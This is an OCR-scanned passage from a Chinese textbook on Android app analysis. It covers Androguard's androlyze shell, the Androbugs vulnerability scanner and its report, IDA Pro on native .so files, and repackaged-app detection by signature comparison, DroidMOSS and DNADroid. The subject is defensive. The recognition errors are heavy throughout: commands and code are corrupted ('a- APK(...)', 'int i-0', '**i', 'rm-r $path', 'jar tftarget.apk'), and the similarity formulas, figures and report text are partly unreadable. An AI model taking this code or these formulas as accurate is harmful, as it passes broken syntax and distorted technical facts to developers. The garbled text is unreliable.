系 的 文件 methodcalls. graphml 以 及 描述 apk 内 各 文件 关系 的 apk. graphml 文件 。 可 以 使 用 
Gephi 查看 生成 的 graphml 文件 ,不 过 图 形 中 的 每 个 节点 是 指令 级 别 的 ,效果 不 如 androgexf 
生成 的 gexf 文件 直观 。 

(4) androxgmml 为 参数 指定 的 文件 生成 函数 调用 和 控制 流程 图 ,命令 格式 为 


androxgmml.py -i test.apk -o out.xgmml 


输出 为 xgmml 文件 ,通过 Cytoscape 软件 可 打开 查看 。 

3) androlyze 

androlyze. py 为 分 析 人 员 提 供 了 一 个 交互 式 分 析 环 境 , 在 终端 输入 androlyze. py -s 
即 可 进入 shell 交互 环境 。 这 里 以 寻找 funct2() 方 法 的 调用 路 径 为 例 ,简单 介绍 
androlyze. py 的 使 用 。 

(1) 获取 APK 对 象 进行 分 析 。 

在 终端 中 输入 以 下 命令 : 


a- APK(". /testapp/sample.apk") 


则 a 中 存储 了 待 分 析 应 用 的 apk 对 象 ,通过 输入 “a. "之 后 按 Tab 键 , 可 以 查看 可 对 该 对 象 
进行 的 操作 ,如 图 11-22 所 示 。 

例如 ,输入 a. get_activities() 即 可 列 出 sample. apk 中 的 所 有 Activity 组 件 ,如 图 11-23 
所 示 。 

(2) 获取 DalvikVMFormat 对 象 。 

在 终端 中 输入 


d-DalvikVWMFormat (a.get_dex()) 


d 中 便 存储 了 sample. apk 的 DalvikVMFormat 对 象 。 针 对 该 对 象 可 进行 的 操作 如 图 11-24 
所 示 。 
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In [4]: a. 
a.androidversion 
a.arsc 
a.axml 


a.declared permissions 
a.filename 

a.files 

a.files crc32 

a.format value 

a.get AndroidManifest 

a.get accivities 

a.get all dex 

a.get android manifest axml 

a.get android manifest xnl 

a.get android resources 

get androidversion code 

get androidversion name 
a.get app icon 

a.get app name 

a.get certificate 

a.get declared permissions 

a.get declared permissions details 
a.get details permissions 





a.get intent filters 
a.get libraries 

a.get main activity 

a.get max sdk version 

a.get min sdk version 

a.get package 

a.get permissions 

a.get providers 

a.get rav 

get receivers 

a.get requested aosp permissions 

a.get requested aosp permissions details 
a.get requested permissions 

a.get requested third party permissions 
get services 

a.get signature 

a.get signature name 

get signature names 

get signatures 

get target sdk version 

a.is valid APK 

a.magic file 











a.get dex 

a.get element 
a.get elements 
a.get file 

a.get filename 
a.get files 

a.get files crc32 


a.get files types 





a.get files information 


a.new zip 
a.package 


a.permission module 


a.permissions 
a.show 
a.valid apk 
a.xml 

a.zip 
a.zipmodule 





图 11-22 androlyze 解析 对 象 


In [2]: a.get activities() 











Out[2]: ['android.example.MainActivity', 'android.example.MainActivirty2'] 
图 11-23  androlyze 解析 Activity 组 件 图 

In [4]: d. 
d.CM d.get cm method d.get methods id item 
d.add idx d.get cm string d.get operand html 
d.api version d.get cm type d.get regex strings 
d.classes d.get codes item d.get string data item 
d.classes names d.get debug info item d.get strings 
d.codes d.get determineException d.header 


d.colorize operands 
d.config 

d.create python export 
d.debug 

d.disassemble 

d.fields 

d.fix checksums 

d.get BRANCH DVM OPCODES 
d.get all fields 

d.get api version 

d.get buff 

d.get class 

d.get class manager 
d.get classes 

d.get classes def item 
d.get classes names 
d.get cm field 


d.get determineNext 
d.get field 

d.get field descriptor 
d.get fields 

d.get fields class 

d.get fields id item 
d.get format 

d.get format type 

d.get header item 

d.get idx 

d.get len methods 

d.get method 

d.get method by idx 

d.get method descriptor 
d.get methods 

d.get methods class 

d.get methods descriptor 


d.length buff 
d.list classes hierarchy 
d.map list 

d.methods 

d.print classes hierarchy 
d.read 

d.read b 

d.readat 

d.register 

d.save 

d.set buff 

d.set decompiler 

d.set gvmanalysis 

d.set idx 

d.set vmanalysis 

d.show 

d.strings 





图 11-24 ”获取 DalvikVMFormat 对 象 
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DalvikVMFormat 对 象 存储 了 dex 文件 信息 ,通过 d. show() 即 可 获取 DalvikFormat 
类 对 dex 文件 的 分 解 信息 ,包括 字符 串 、 类 型 .原型 .字段 、 方 法、 类 以 及 代码 等 各 种 信息 ， 
图 11-25 为 类 型 信息 描述 的 部 分 内 容 。 





MAP TYPE ITEM TYPE TYPE ID ITEM 
BRRRREERÉ Type List Item 

iififffttt Type Id Item 

descriptor idx-9 descriptor idx value-I 

iiiiififtt Type Id Item 

descriptor idx-11 descriptor idx value-Landroid/app/Activity; 
iiiiifittE Type Id Item 

descriptor idx-12 descriptor idx value-Landroid/content/Context; 
EEHEEHE Type Id Item 

descriptor idx-13 descriptor idx value-Landroid/content/Intent; 
EEHEEHE Type Id Item 

descriptor idx-14 descriptor idx value-Landroid/example/BuildConfig; 
HEEREEEEEE Type Id Item 

descriptor idx-15 descriptor idx value-Landroid/example/MainActivity2; 
iiiiiiittt Type Id Item 

descriptor idx-16 descriptor idx value-Landroid/example/MainActivity; 











图 11-25  DalvikVMFormat 分 类 解析 


(3) 获取 funct2 方法 的 信息 。 
通过 d. get_method("funct2") 可 以 获取 dex 文件 中 名 为 "funct2" 的 方法 信息 ,返回 
值 为 EncodeMethod 对 象 列表 ,如 图 11-26 所 示 。 





In [3]: d.get method("funct2") 
Out[3]: [«androguard.core.bytecodes.dvm.EncodedMethod at 0x4f34110»] 











图 11-26 EncodeMethod 对 象 列 表 解 析 


通过 EncodeMethod 对 象 的 show 方法 可 以 获取 具体 方法 的 类 名 、 参 数 、 反 编译 代码 
等 信息 ,如 图 11-27 Bion o 





In [11]: d.get method("funct2") [0] .show() 

HUE Method Information 
Landroid/example/MainActivity;-»funct2()V [access flags"public] 
rm 

local registers: vO...v2 

- return: void 

HIPH HH HR 






o (00000000) new-instance v0, Landroid/content/Intent; 

1 (00000004) const-class vl, Landroid/example/MainActivity2; 

2 (00000008) invoke-direct v0, v2, vi, Landroid/content/Intent;-»«init»(Landroid/content/Context; Ljava/lan 
g/Class;)V 

3 (0000000e) invoke-virtual v2, v0, Landroid/example/MainActivity;-»startActivity (Landroid/content/Intent; ) 
v 

4 (00000014) return-void 











图 11-27 EncodeMethod 详细 信息 获取 图 


(4) 获取 funct2 方法 的 调用 路 径 。 
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在 终端 中 输入 
vm=VMAnalysis (d) 


vm 中 存储 了 Androguard 针对 DalvikVMFormat 对 象 的 分 析 结 果 ,创建 该 对 象 的 过 
程 就 是 对 DalvikVMFormat 对 象 进行 分 析 的 过 程 。 通 过 vm. get_tained_ packages () 
.search_method() 方 法 ( 注 : tained. packages 为 了 寻找 调用 路 径 在 package 中 做 了 一 些 
标记 ,并 不 是 实际 的 污点 分 析 ) ,可 得 到 funct2 方法 的 调用 路 径 , 得 到 的 结果 为 PathP 对 
象 列表 ,如 图 11-28 所 示 。 





In [25]: vm.get tainted packages().search methods ("Landroid/example/MainActivity", "funct 
2mm 


2ut[25]: [«androguard.core.analysis.analysis.PathP instance at 0x2c413f8»] 





11-28 PathP xt $& ZJ X 


通过 show Path 方法 可 以 展示 具体 的 路 径 信息 ,如 图 11-29 所 示 。 
In [26]: show Paths(d,vm.get tainted packages().search methods("", "funct2","")) 
1 Landroid/example/MainActivity;-»onCreate(Landroid/os/Bundle;)V (0x16) ---» Landroid/ex 


ample/MainActivity;-»funct2 ()V 


图 11-29 具体 路 径 信息 


由 图 11-29 中 的 信息 可 知 ,funct2 方法 由 MainActivity 中 的 onCreate 函数 直接 
调用 。 

除了 上 面 介绍 的 几 个 具体 工具 ,Androguard 还 提供 了 一 套 API 供 分 析 人 员 使 用 以 
扩展 功能 ,Androguard 通过 已 有 工具 提供 的 功能 都 可 以 通过 调用 相关 的 API 来 实现 
开发 。 

3. Androbugs 

Androbugs"*? JEE Androguard 基础 上 开发 的 工具 ,其 主要 作用 是 为 Android 应 用 
开发 者 检测 apk 文件 中 的 漏洞 。Android 应 用 开发 者 可 能 并 不 知晓 已 有 的 安全 漏洞 ,或 
者 在 开发 时 未 成 功 规避 漏洞 ,导致 开发 的 Android 应 用 依旧 存在 已 为 人 所 知 的 漏洞 ,为 
Android 应 用 的 安全 带 来 威胁 。 为 了 改变 这 一 现状 ,Androbugs 应 运 而 生 。Androbugs 
根据 已 有 漏洞 的 原理 生成 相应 的 判断 规则 ,对 待 测 应 用 的 权限 使 用 、 函 数 参数 和 调用 路 径 
等 进行 匹配 ,生成 详细 的 报告 列举 出 漏洞 可 能 存在 的 位 置 , 并 在 报告 中 附 上 漏洞 的 简要 说 
明 及 相关 链接 方便 开发 者 查看 。 

Androbugs 在 Androguard 基础 上 增加 了 3 个 功能 。 

D 静态 DVM 引擎 

静态 DVM 引擎 可 直接 处 理 Dalvik 字 节 码 , 因 此 ,dex 文 件 可 以 直接 作为 Androbugs 
工具 的 输入 ,当然 apk 文件 也 可 以 作为 输入 。Androbugs 维护 了 一 份 简单 的 寄存 器 表 ,将 
寄存 器 的 值 和 寄存 器 关联 起 来 ,在 分 析 函 数 调用 时 可 以 获取 此 时 调用 参数 所 在 的 寄存 器 ， 
而 通过 此 处 的 寄存 器 表 ,Androbugs 可 以 查找 到 寄存 器 对 应 的 值 , 即 为 此 时 的 参数 值 。 

静态 DVM 引擎 根据 具体 的 操作 码 处 理 寄 存 器 中 的 值 ,相应 的 操作 规则 如 表 11-3 
所 示 。 
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表 11-3 静态 DVM 的 操作 规则 

















操作 码 opcode Smali 操作 码 静态 DVM 操作 

[const] 或 

0xl2<opcode<0xlc [const/xxj 或 在 寄存 器 表 中 设置 对 应 的 立即 值 
[const-string] 
[move-result vAA] 或 

« « [ move-result-wide vAA ]zk E 

0x0a<opcode<0x0d [eesel obiet v AA TR 清除 寄存 器 表 中 的 立即 值 
[move-exception vAA] 
[aget] 或 

Ox44SCopcodescOx4a 或 dm xx] 或 

0x52<opcode<0x58 或 | [8 x 清除 寄存 器 表 中 的 立即 值 

Ox60sCopcodexc0x66 boa 
[sget] 或 
[sget-xxxx] 

Opcode— —0x6e [ invoke-virtual ] 将 方法 名 添加 到 唤醒 的 方法 列表 中 











例如 下 面 的 代码 : 


Public void helloworld(){ 
int i-0; 
fuct(i); 

} 

静态 DVM 引擎 在 处 理 int i—0 这 一 语句 时 ,发 现 其 操作 码 为 12, 因 此 将 0 放置 于 寄 
存 器 表 中 。 接 着 处 理 fuct(i) 对 应 的 字 节 码 为 6e, 则 将 fuct 方法 添加 到 invoked method 
list 中 。 通 过 寄存 器 表 即 可 获取 helloWorld 在 调用 fuct 方法 时 传人 的 参数 的 值 0。 

2) 高 效 字 符 串 搜索 引擎 

分 析 人 员 通 常 使 用 正则 匹配 的 方式 在 代码 中 查找 字符 串 ,而 高 效 字 符 串 搜索 引擎 则 
根据 dex 字 节 码 的 结构 特点 提供 了 更 快速 地 查找 字符 串 的 方法 。 

dex 文件 中 使 用 的 字符 串 数据 都 在 dex 文件 中 保存 有 一 个 对 应 的 值 显示 该 字符 串 在 
dex 文件 中 的 偏 移 量 (offset) ,将 该 值 作 为 字符 串 的 index。 在 查找 字符 串 时 ,首先 获取 其 
对 应 的 index, 之 后 查找 每 个 方法 中 操作 码 为 0xla(const-string) 和 0xlb(const-string/ 
jumbo) 的 指令 , 即 代码 中 操作 字符 串 的 地 方 ,检测 此 指令 中 字符 串 index 是 否 与 查找 的 字 
IFE index 相符 ,若是 , 则 说 明 此 方法 使 用 了 需要 查找 的 字符 串 。 由 此 ,Androbugs 不 仅 
可 以 确定 字符 串 是 否 被 使 用 ,还 可 以 获取 使 用 此 字符 串 的 所 有 位 置 。 

3) 过 滤 引 擎 

Android 应 用 中 大 量 使 用 了 Android 开发 库 、 广 告 库 、 推 送 库 等 库 代 码 ,为 了 提高 分 
析 效 率 , Androbugs 会 在 查找 路 径 时 将 这 些 库 的 代码 过 滤 掉 ,例如 android/support/、 
com/actionbarsherlock/ 和 org/apache/ 包 下 的 代码 。 当 Androbugs 找到 字符 串 或 方法 的 
调用 路 径 后 ,会 先 检查 其 路 径 源 是 否 存在 于 这 些 库 中 ,若是 , 则 先 将 对 应 的 路 径 剔 除 , 再 进 
行 后 续 的 操作 。 
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Androbugs 生成 的 检测 报告 如 图 11-30 Bros 。 











maemple jex.permtest? 
Package Version Name: 1.0 
Package Version Code: 1 





[Critical] Ap App Sandbox Permission Checking: 
Security issues "MODE. WORLD, READABLE" or "MODE_WORLD_WRITEABLE" found (Please check: 
Pei ww wes. ari dex he/ Habla. Coop 10 2014 Md): 

gets! ferences] 

=> eor example! lxi permtasta/ tt gr luda android content! es 1 fh SharedPreferences; (0x6) -- 
jndroid/ Context; > getsharedPreferences(ijava/ lang/ String; Dua 'content/ SharedPreferences; 
-> Marl eramle ex permet niei Shuas (landrei, content) Contexts 1 ndroid/ content SharedPreferences; (0x6) -- 

getSharedPreferences(Ljava/ lang/ String; T)Lar 'content/ SharedPreferences, 











[notice] AndroidManifest Adb Backup Checking: 
ADB Backup is ENABLED for this app (default: ENABLED), ADB Backup is a good tool for backing up all of your files. If i's open 
for this app, people who have your phone can copy alf the sensitive data for this app in your phone (Prerequisite: 1.Unlock, - 
phone's screen 2.Open the developer mode). The sensitive data may include lifetime access token, username or password, 
Security case related to ADB Backup: 
):/ / www.securityfocus.com/ ar Tele 1/530288/ 30/ o/ threaded 
Sp/ en ee ee ea) cue. 2019. S112 evernote- android insecure-storage- of- pin- dita- bvpass- f-pin-protection/ 
Ruttp:// nelenkov blogepot.co.uk/ 201/06/ unpacking- android- backups html 
Reference: http:// developer.android.com/ guide/ topics/ manifest/ application- element.htmi sallowbackup 
[Info] «Command» Runtime Command Checking: 
is app ig not using erical function, Runtime gethurtineQ. exec". 
[info] sounna Executing “root” or eriam Privilege Checkit 
find codes checking "root" permission(su) or getting system permission (It's still possible we did not find out). 














图 11-30  Androbugs 检测 报告 


从 检测 报告 中 可 以 看 出 ,Androbugs 的 检测 分 为 两 部 分 : 

(1) apk 基本 信息 的 检测 ,如 包 名 sdk 的 最 小 版 本 以 及 签名 信息 等 。 

(2) apk 漏洞 检测 ,包括 App Sandbox Permission Checking, AndroidManifest Adb 
Backup Checking 和 Runtime Command Checking 等 。 

这 里 以 App Sandbox Permission Checking 为 例 简 要 说 明 Androbugs 的 漏洞 检测 机 
制 的 实现 原理 。 

(1) 使 用 vmx. get_tainted_packages(). search_methods_exact_match() 方 法 获取 
openOrCreateDatabase .getDir .getSharedPreferences、openFileOutput 3X 4 个 方法 的 调用 
路 径 。 

(2) 使 用 过 滤 引 擎 剔除 无 效 的 路 径 。 

(3) 将 剩余 的 路 径 放 入 静态 DVM 引擎 中 ,可 得 到 这 4 个 方法 被 调用 时 传人 的 参数 。 
找到 方法 中 mode 对 应 的 参数 ,判断 其 是 否 为 MODE_WORLD_READABLE、MODE_ 
WORLD_ WRITEABLE 或 MODE_ WORLD READABLE + MODE WORLD . 
WRITEABLE。 若 是 , 则 认为 存在 安全 漏洞 。 

针对 App Sandbox Permission Checking 漏洞 的 检测 结果 如 图 11-31 所 示 。 





[Critical] App Sandbox Permission Checking 


Securty issues "MODE. WORLD. READABLE" or "MODE. WORLD. WRITEABLE" found (Please check: 
https:/ / www.owasp.org/ index.php/ Mobile 3 Top. 10, 2014-M2): 
[getSharedPreferences] 


=> Leon example iex Peratesta/ Mainactidtyy- »fuct3(Landroid/ content/ Context; I)Landroid/ content/ SharedPreferences; (0x6) -~ 
ndroid/ content/ Context; - Tv I)Landroid/ content/ SharedPreferences; 
=> Loom examtiel jox perm ed Ave »fuctS(Landroid/ content/ Context; 1)Landroid/ content/ SharedPreferences; (0x6) - 
indroid/ content/ redPreferences(Ljava/ lang/ String; I)Landroid/ content/ SharedPreferences; 

















图 11-31 漏洞 检测 结果 
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从 检测 结果 中 可 以 看 出 ,com/example/jex/permtest2/MainActivity 类 中 的 fuct3 和 
fuct5 方法 调用 了 getSharedPreferences 方法 , 且 其 mode 参数 为 MODE_ WORLD_ 
READABLE,MODE WORLD WRITEABLE 或 MODE_WORLD_READABLE + 
MODE_WORLD_WRITEABLE。 

4. IDA Pro 

虽然 Android 应 用 主要 使 用 Java 语言 进行 开发 ,但 是 出 于 提高 运行 效率 、 对抗 反 编 
译 等 目的 ,开发 者 也 会 将 部 分 功能 使 用 C/C++ 进行 开发 ,原生 代码 会 以 . so 文件 的 形式 
存在 于 apk 文件 中 。 

前 面 介绍 的 两 款 工具 主要 是 对 Java 层 的 代码 进行 分 析 , 想 要 对 原生 代码 进行 分 析 ， 
就 需要 用 到 IDA Pro?9 。IDA Pro 是 一 款 强大 的 静态 反 汇 编 分 析 工 具 , 从 6. 1 版 本 开始 ， 
提供 了 对 Android 的 静态 分 析 与 动态 调试 支持 ,其 功能 包括 dex 文件 的 反 汇 编 ,原生 代码 

对 于 dex 文件 的 分 析 , 笔 者 认为 ,相对 于 IDA. Pro 来 说 ,Androguard 等 工具 提供 的 分 
析 功 能 更 为 完善 ,因此 这 里 不 再 介绍 IDA. Pro 对 dex 文件 的 分 析 功 能 , 仅 介绍 IDA. Pro 
对 . so 文件 的 分 析 功 能 。 

打开 IDA Pro 主 窗口 ,将 . so 文件 从 apk 文件 中 解压 出 来 直接 拖 放 到 IDA. Pro 主 窗 
口 ( 或 者 将 apk 文件 拖 放 到 IDA. Pro 主 窗口 ,从 弹出 的 对 话 框 中 选中 要 分 析 的 . so 文件 ) ， 
此 时 弹出 加 载 新 文件 对 话 框 , 如 图 11-32 所 示 , 从 中 选择 ELF for ARM(Shared object? 
Lelf. ldw] 选 项 , 单 击 OK 按钮 ,IDA 即 开始 进行 分 析 。 





pF T 
Load a new file Ux] 





Load file ERR GRE WRTRER TR eesernob-sdi-2 2.3 reibsvermeabiVi 




































































Binery fle. 
Processor type. 
Intel 80x86 processors:metepc — —  ž am| Se 
-Analysis 
Loedmgsegmen [mao — | Enebled 
Loading offset [000000000 [Viindicatorenebled | 
[Options — — — — — — — —3 
Create base for debugging r— 
E Load resources : 
Rename DLL entries. - 
E Manual load Kemel options? 
[7]Fill segment gaps 
Loading options ELEC 
C Create FLAT group. - — 
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图 11-32 IDA 分析 ARM 下 的 ELF 文件 


IDA Pro 分 析 完 成 后 的 界面 如 图 11-33 所 示 。 
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Æ 11-33 IDA Pro 分 析 界 面 


其 中 ,Functions window 窗口 显示 的 是 . so 文件 中 的 函数 名 称 列表 ,IDA View-A 窗 
口 显 示 汇 编 代 码 ,Hex View-A 窗口 显示 十 六 进 制 机 器 码 。 

需要 分 析 具 体 函 数 时 ,只 需要 在 Functions window 窗口 中 找到 相应 的 函数 名 并 双 
击 , 即 可 在 IDA. View-A 窗口 中 看 到 该 函数 的 汇编 代码 。 如 果 想 要 查看 具体 某 条 指令 的 
十 六 进 制 代码 ,只 需要 单 击 选中 该 指令 ,再 打开 Hex View-A 窗口 即 可 。 如 果 想 要 查看 反 
编译 代码 ,只 需要 在 IDA View-A 窗口 定位 到 目标 函数 的 汇编 代码 后 按 F5 键 , 即 可 在 新 
的 子 窗 口中 显示 出 反 编译 后 的 C 语言 代码 , 供 开发 人 员 阅 读 和 分 析 , 如 图 11-34 所 示 。 


Pseudocode-A EJ 
int _ fastcall forTest8(signed int a1) 





int v1; // r281 
signed int i; // r381 


vi = 8; 

for ( i = 1; i <= a1; **i ) 
v1 += i; 

return v1; 


&mooxonrowvA 


EEEE] 
Y 


图 11-34 IDA 反 编 译 


此 外 ,通过 IDA Pro 还 可 以 查看 函数 的 运行 流程 ,只 需 在 相应 函数 代码 处 通过 右键 
菜单 选择 Graph View 命令 即 可 ,如 图 11-35 所 示 。 同 样 , 通 过 右键 菜单 选择 Text View 
命令 即 可 返回 之 前 的 文本 模式 。 


134 重 打包 应 用 检测 


重 打包 应 用 的 特点 是 与 原 应 用 的 代码 和 功能 相似 ,但 是 签名 信息 不 同 ,因此 , 重 打包 
应 用 的 检测 主要 从 应 用 相似 性 和 签名 信息 比较 两 个 方面 和 人手。 
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; ForTestü(int) 
EXPORT _z8forTest 时 | 
| 28ForTestüi 























mous 
Bx LR 
; End of function forTest@(int) 


RO, R2 








ADDS — R3, #1 











图 11-35 IDA 的 解析 运行 流程 


1. 签名 检查 

签名 检查 是 检测 一 个 apk 是 否 被 重 打包 的 重要 途径 ,因为 重 打包 apk 文件 的 恶意 开 
发 者 不 具有 原 开 发 者 的 签名 密 钥 , 因 此, 重 打包 的 apk 文件 的 签名 与 原 apk 文件 的 签名 不 
同 。 通 过 对 比 目 标 apk 和 原 apk 签名 的 MD5 码 (或 SHA1) 码 是 否 相同 ,可 以 判断 两 个 应 
用 的 签名 是 否 相 同 。 

apk 文 件 结构 如 图 11-36 所 示 , 签 名 相关 信息 存放 在 META-INF 文件 夹 下 的 
CERT. RSA 文件 中 ,CERT. RSA 文件 为 PKCS7 格式 文件 ,需要 使 用 keytool 等 工具 进 
行 解析 。 


dMETA-INF ”一 人 L']CERT.RSA 

d res L)CERT.SF 

LJ AndroidManifest.xml DD MANIFEST.MF 
| | dlasses.dex 

LI resources.arsc 


图 11-36 apk 文件 结构 
在 Linux 环境 中 实现 签名 检查 的 步骤 如 下 : 
(1) 查找 apk 中 签名 文件 所 在 路 径 : 
path-$ (jar tftarget.apk| grep SA) 
(2) 将 签名 文件 从 apk 文件 中 解压 出 来 : 
jar xf target.apk $path 
(3) 获取 指纹 证 书 : 


keytool -printcert - file $path 
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(4) 删除 之 前 解压 的 RSA 文件 : 
rm-r $path 


获取 到 的 证 书信 息 如 图 11-37 所 示 。 





Owner: CN=k, OU-k, O-k, L-k, ST-k, C-k 
Issuer: CN-k, OU-k, O-k, L-k, ST-k, C-k 
Serial number: 51271863 
Valid from: Mon Nov 02 16:02:43 CST 2015 until: Fri Oct 26 16:02:43 CST 2040 
Certificate fingerprints: 
MD5: 31E:69:C5:F0:2E:64:85:CE:AF:4D:25:31:48:65:E6:51 


SHA1: 29:27:A3:99:DE:38:24:9E:57:19:C2:8A:D9:97:EC:83:39:B2:4D:4E 
Signature algorithm name: SHA256withRSA 
Version: 3 





图 11-37 证 书信 息 


从 中 可 以 获取 签名 的 MD5 值 或 SHA1 值 。 

(5) 通过 对 比 两 个 apk 文件 的 MD5 值 或 者 SHA1 值 可 以 判断 两 个 应 用 的 签名 是 否 
相同 。 

2. 应 用 相似 性 检测 

分 析 两 个 应 用 之 间 的 相似 性 一 直 是 检测 重 打包 应 用 的 重点 和 难点 ,下 面 介 绍 几 类 典 
型 的 检测 算法 。 

1) DroidMOSS 
重 打 包 应 用 的 作者 一 般 不 会 修改 原 应 用 主体 功能 相关 的 代码 ,因此 DroidMOSS 的 
主要 思想 是 将 dex 文件 中 的 操作 码 作 为 特征 进行 比较 07] 。 

DroidMOSS 将 dex 文件 中 的 操作 码 序列 分 成 小 段 , 对 每 一 段 计算 哈 希 值 ,连接 后 作 
为 当前 应 用 的 指纹 ,计算 待 比较 的 两 个 应 用 的 指纹 ,计算 其 编辑 距离 作为 两 个 应 用 的 相 
似 度 。 

DroidMOSS 的 整体 方案 框架 如 图 11-38 所 示 , 其 选取 Google Play 上 的 应 用 作为 原 
应 用 ,检测 第 三 方 市 场 上 的 应 用 是 否 为 重 打包 应 用 。 

开发 者 ID 


应 用 .| 特征 提取 Fem, pamer 应 用 指纹 | 














第 三 方 市 场 
应 用 签名 
























































相似 性 计算 ETES _ 
官方 市 声 
应 用 Spann e [o S pln 
计算 
开发 者 D 
图 11-38 DroidMOSS 整体 框架 
方案 分 为 3 个 步骤 ， 


a) 提取 特征 。 
DroidMOSS 使 用 baksmali 工具 将 classes. dex 反 编译 ,将 Dalvik 字 节 码 的 操作 码 作 
为 代码 特征 。 巾 于 部 分 重 打包 应 用 会 修改 原 应 用 里 面 嵌 入 的 广告 库 , 为 了 消除 广告 库 代 
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码 对 代码 特征 的 影响 ,DroidMOSS 维护 了 一 个 现 有 广告 库 的 白 名 单 以 剔除 代码 中 广告 相 
关 的 部 分 。 此 外 ,在 这 一 步骤 中 ,DroidMOSS 会 提取 开发 者 信息 ,用 于 后 面 分 析 两 个 应 用 
是 否 是 同一 个 开发 者 开发 的 应 用 ,如 果 是 , 则 不 认为 存在 重 打包 的 现象 。Android 应 用 的 
META-INF 目录 中 含有 完整 的 开发 者 证 书 , 可 以 获取 开发 者 名 称 、 组 织 信 息 、 公 钥 指 纹 
等 ,DroidMOSS 将 每 一 个 开发 者 证 书 对 应 到 一 个 唯一 的 32b 的 ID 中 。 

(2) 生成 指纹 。 

DroidMOSS 采用 模糊 哈 希 算法 来 生成 应 用 指纹 ,模糊 哈 希 算法 也 称 基 于 内 容 分 割 的 
分 片 蛤 希 算 法 (Context Triggered Piecewise Hashing, CTPH) ,主要 用 于 文件 的 相似 性 
比较 ,对 于 文件 内 容 经 修改 增删 变化 后 的 相似 关系 能 较 好 地 判断 。 

DroidMOSS 将 步骤 (1) 中 获取 的 操作 码 序列 分 割 成 小 块 ,对 每 个 块 分 别 计算 哈 希 值 ， 
这 些 值 构成 的 序列 作为 指纹 。 这 一 步骤 中 的 难点 是 确定 每 一 块 的 边界 ,DroidMOSS 使 用 
了 一 个 滑动 窗口 从 指令 序列 的 最 开始 移动 ,直到 滚动 哈 希 值 等 于 预先 设 定 的 重 置 点 , 则 当 
前 扫描 到 的 指令 序列 为 一 个 块 。 之 后 滑动 窗口 重新 开启 一 个 块 。DroidMOSS 选用 了 一 
个 素数 作为 重 置 点 的 值 ,保证 块 长 度 的 随机 性 和 方案 的 鲁 棒 性 。 算 法 示意 图 如 图 11-39 
所 示 。 


滚动 哈 希 ( 滑动 窗口 FERA 














图 11-39 DroidMOSS 算法 示意 图 





G) 相似 性 计算 。 

这 一 步 主要 是 计算 待 比较 的 两 个 应 用 指纹 之 间 的 编辑 距离 ,以 表示 两 个 应 用 的 相 
似 度 。 

按 两 个 指纹 的 序列 长 度 构成 一 个 矩阵 ,矩阵 中 元 素 的 初始 值 均 为 0, 对 应 位 置 处 的 两 
个 序列 元 素 ( 即 上 一 步 得 到 的 每 个 块 的 哈 希 值 ) 如 果 相 等 则 变量 const 王 0, 和 否则 const 一 1， 
矩阵 中 相应 位 置 的 值 按 以 下 公式 计算 : 

matrix[ ;.j ] —min(matrix[; — 1.7 ] + 1. matrix[ i.j — 1] 
+ 1 matrix[ i — 1.j — 1] 4- const) 
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则 matrix[lenl. len2] 的 值 为 最 后 的 编辑 距离 。 


接着 根据 编辑 距离 计算 两 个 应 用 的 相似 性 ,计算 公式 如 下 : 


RECS HE CUM distance 
similarityScore — ( a R ETS) ) X100 


如 果 计 算 结 果 超过 70, 且 两 个 App 是 由 不 同 的 开发 者 密 钥 进行 签名 的 , 则 判定 来 自 
第 三 方 市 场 的 应 用 为 重 打包 应 用 。 

2) DNADroid 

DNADroid^* 3€ H] fg HK ffi £l (Program Dependence Graph，PDG) 匹 配 的 方法 检测 
重 打包 应 用 。PDG 是 针对 方法 的 ,一 个 方法 对 应 一 个 PDG ,每 个 节点 是 一 个 指令 , 边 是 
指令 之 间 的 依赖 关系 。 有 两 种 类 型 的 依赖 : 数据 依赖 和 控制 依赖 。 如 果 一 条 指令 中 的 一 
个 变量 的 值 依赖 于 另 一 条 指令 , 则 两 条 指令 之 间 存 在 数据 依赖 。 如 果 一 条 指令 的 运行 取 
决 于 另 一 条 指令 的 取 值 为 真 还 是 假 , 则 两 条 指令 之 间 存 在 控制 依赖 。 为 了 对 抗 指令 重 排 、 
插入 和 删除 ,DNADroid 在 使 用 PDG 时 只 保留 数据 依赖 边 。 

DNADroid 首先 使 用 dex2jar 工具 将 dex 文件 转变 为 jar 文件 ,使 用 WALA 为 每 个 
类 中 的 每 个 方法 构建 PDG。 接 下 来 便 是 比较 PDG 的 相似 度 。 由 于 PDG 的 数量 比较 多 ， 
因此 DNADroid 采取 了 以 下 3 个 措施 来 降低 比较 规模 : 

(1) 剔除 广告 库 、. 社 交 共 享 库 等 公共 库 。DNADroid 采用 这 些 公共 库 的 包 名 和 
SHA1 值 为 标准 精确 地 剔除 代码 中 的 公共 库 。 

(2) 无 损 过 滤 。DNADroid 将 节点 数 小 于 10 的 PDG 剔除 ,因为 这 些 规 模 很 小 的 代 
码 通 常 是 微不足道 的 功能 或 者 是 模板 代码 ,对 应 用 程序 整体 没有 太 大 影响 。 

CD 有 损 过 滤 。 将 方法 中 类 型 分 布 不 同 的 PDG 丢弃 ,因为 类 型 分 布 不 同 的 方法 不 可 
能 是 相似 的 。 例 如 一 个 包含 很 多 方法 调用 节点 的 PDG 不 可 能 与 一 个 不 包含 方法 调用 节 
点 的 PDG 相似 。 为 了 进行 有 损 过 滤 ,DNADroid 首先 为 一 个 方法 对 中 的 每 一 个 方法 计算 
一 个 类 型 分 布 向 量 , 其 中 记录 每 种 类 型 的 节点 在 PDG 中 出 现 的 次 数 ;然后 计算 两 个 向 量 
之 间 的 相似 度 ,相似 度 未 超过 设 定 阔 值 (0. 005) 的 PDG 被 丢弃 。 

通过 了 上 述 3 个 过 滤 措 施 的 PDG 对 才 会 进行 相似 度 的 比较 。 对 于 一 对 要 进行 比较 
的 PDG.DNADroid 使 用 子 图 同 构 算 法 对 其 进行 匹配 ,具体 使 用 了 VF2 算法 ,利用 PDG 
含有 不 同 的 节点 类 型 ,只 有 相同 类 型 的 节点 才 可 以 匹配 的 特点 ,约束 需要 进行 测试 的 节点 
对 规模 ,提高 了 子 图 同 构 算法 的 效率 。 

最 后 ,DNADroid 基于 匹配 的 PDG 对 计算 两 个 应 用 之 间 的 相似 度 。 假 设 应 用 A 中 
的 一 个 方法 标记 为 了, 其 PDG 中 节点 的 数量 标记 为 | f| ,应 用 B ris f£ 的 PDG 2S fic FE VG 
配 的 方法 标记 为 m CAO , 则 应 用 A 与 应 用 B 的 相似 度 计算 公式 如 下 : 


2 |mCD | 
simau» = "AU LFI 


其 含义 为 应 用 程序 A 与 应 用 程序 B 中 匹配 代码 在 应 用 程序 A 中 所 占 的 比例 。 若 该 比例 
超过 一 定 值 , 则 表明 两 个 应 用 相似 。 
